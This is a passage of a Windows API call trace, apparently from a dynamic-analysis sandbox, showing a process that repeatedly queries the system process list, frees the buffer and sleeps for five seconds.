Interval=0xdea74*=-50000000) returned 0x0 [0146.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.985] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.150] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.340] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.628] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.679] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0147.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0147.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0147.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0147.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0147.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0147.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0147.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.032] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 